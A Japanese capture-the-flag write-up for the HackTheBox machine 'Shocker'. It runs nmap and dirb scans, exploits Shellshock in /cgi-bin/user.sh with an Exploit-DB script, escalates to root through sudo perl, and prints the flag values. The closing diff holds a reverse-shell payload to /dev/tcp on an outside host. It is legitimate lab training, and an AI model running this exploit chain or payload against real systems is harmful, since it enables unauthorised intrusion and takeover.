SMBが公開されている
# nmap -A -n -F -T5 shocker.htb Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-16 03:23 UTC Nmap scan report for shocker.htb (10.10.10.56) Host is up (0.045s latency). Not shown: 99 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn't have a title (text/html). Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: print server|printer|general purpose|VoIP phone|broadband router Running (JUST GUESSING): HP embedded (90%), IBM AIX 4.X (86%), Tadiran embedded (85%), Wind River VxWorks 5.X (85%), Motorola embedded (85%), Microsoft Windows 2003|XP (85%) OS CPE: cpe:/h:hp:jetdirect_170x cpe:/h:hp:inkjet_3000 cpe:/o:ibm:aix:4.3 cpe:/h:tadiran:flexset-ip_280s cpe:/o:windriver:vxworks:5.4 cpe:/h:motorola:surfboard_sbv5121 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_xp Aggressive OS guesses: HP 170X print server or Inkjet 3000 printer (90%), HP LaserJet 4250 printer (87%), IBM AIX 4.3 (86%), Tadiran FlexSet-IP 280S VoIP phone (85%), Motorola SURFboard SBV5121 broadband router (VxWorks 5.4) (85%), Microsoft Windows Server 2003 SP2 (85%), Microsoft Windows XP (85%), Microsoft Windows XP SP3 (85%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops
80番ポートにアクセスしてみる
# gobuster dir -u http://shocker.htb -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://shocker.htb [+] Threads: 10 [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/08/16 03:30:41 Starting gobuster =============================================================== Progress: 65661 / 220561 (29.77%)
dirbを利用して、/cgi-bin/user.shがあることがわかる。
# dirb http://shocker.htb/ ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Sun Aug 16 07:39:22 2020 URL_BASE: http://shocker.htb/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://shocker.htb/ ---- + http://shocker.htb/cgi-bin/ (CODE:403|SIZE:294) + http://shocker.htb/index.html (CODE:200|SIZE:137) + http://shocker.htb/server-status (CODE:403|SIZE:299) ----------------- END_TIME: Sun Aug 16 07:57:47 2020 DOWNLOADED: 4612 - FOUND: 3 # dirb http://shocker.htb/cgi-bin/ -w /usr/share/dirb/common.txt -X .sh ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Sun Aug 16 08:01:30 2020 URL_BASE: http://shocker.htb/cgi-bin/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt OPTION: Not Stopping on warning messages EXTENSIONS_LIST: (.sh) | (.sh) [NUM = 1] ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://shocker.htb/cgi-bin/ ---- + http://shocker.htb/cgi-bin/user.sh (CODE:200|SIZE:118) ----------------- END_TIME: Sun Aug 16 08:20:29 2020 DOWNLOADED: 4612 - FOUND: 1
マシン名的にShellShockを試してみる
# searchsploit shellshock --------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path --------------------------------------------------------------------------------------------------------------- --------------------------------- Advantech Switch - 'Shellshock' Bash Environment Variable Command Injection (Metasploit) | cgi/remote/38849.rb Apache mod_cgi - 'Shellshock' Remote Command Injection | linux/remote/34900.py Bash - 'Shellshock' Environment Variables Command Injection | linux/remote/34766.php Bash CGI - 'Shellshock' Remote Command Injection (Metasploit) | cgi/webapps/34895.rb Cisco UCS Manager 2.1(1b) - Remote Command Injection (Shellshock) | hardware/remote/39568.py dhclient 4.1 - Bash Environment Variable Command Injection (Shellshock) | linux/remote/36933.py GNU Bash - 'Shellshock' Environment Variable Command Injection | linux/remote/34765.txt IPFire - 'Shellshock' Bash Environment Variable Command Injection (Metasploit) | cgi/remote/39918.rb NUUO NVRmini 2 3.0.8 - Remote Command Injection (Shellshock) | cgi/webapps/40213.txt OpenVPN 2.2.29 - 'Shellshock' Remote Command Injection | linux/remote/34879.txt PHP < 5.6.2 - 'Shellshock' Safe Mode / disable_functions Bypass / Command Injection | php/webapps/35146.txt Postfix SMTP 4.2.x < 4.2.48 - 'Shellshock' Remote Command Injection | linux/remote/34896.py RedStar 3.0 Server - 'Shellshock' 'BEAM' / 'RSSMON' Command Injection | linux/local/40938.py Sun Secure Global Desktop and Oracle Global Desktop 4.61.915 - Command Injection (Shellshock) | cgi/webapps/39887.txt TrendMicro InterScan Web Security Virtual Appliance - 'Shellshock' Remote Command Injection | hardware/remote/40619.py --------------------------------------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results # searchsploit -m linux/remote/34900.py # sed -i 's/\r//' 34900.py # python 34900.py payload=reverse rhost=10.10.10.56 lhost=172.17.0.2 lport=4444 pages=/cgi-bin/user.sh [!] Started reverse shell handler [-] Trying exploit on : /cgi-bin/user.sh [!] Successfully exploited [!] Incoming connection from 172.17.0.1 172.17.0.1> id uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare) 172.17.0.1> pwd /usr/lib/cgi-bin 172.17.0.1> cat /home/shelly/user.txt 2ec24e11320026d1e70ff3e16695b233 172.17.0.1> sudo -l Matching Defaults entries for shelly on Shocker: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User shelly may run the following commands on Shocker: (root) NOPASSWD: /usr/bin/perl 172.17.0.1> sudo /usr/bin/perl -e 'exec "/bin/bash";' 172.17.0.1> id uid=0(root) gid=0(root) groups=0(root) 172.17.0.1> cat /root/root.txt 52c2715605d70c7619030560dc1ca467
KaliLinuxをDockerで動作させているため、34900.pyを一部修正している。
# diff 34900.py /usr/share/exploitdb/exploits/linux/remote/34900.py 76c76 < payload = "() { :;}; /bin/bash -c /bin/bash -i >& /dev/tcp/10.10.14.7/"+str(lport)+" 0>&1 &" --- > payload = "() { :;}; /bin/bash -c /bin/bash -i >& /dev/tcp/"+lhost+"/"+str(lport)+" 0>&1 &"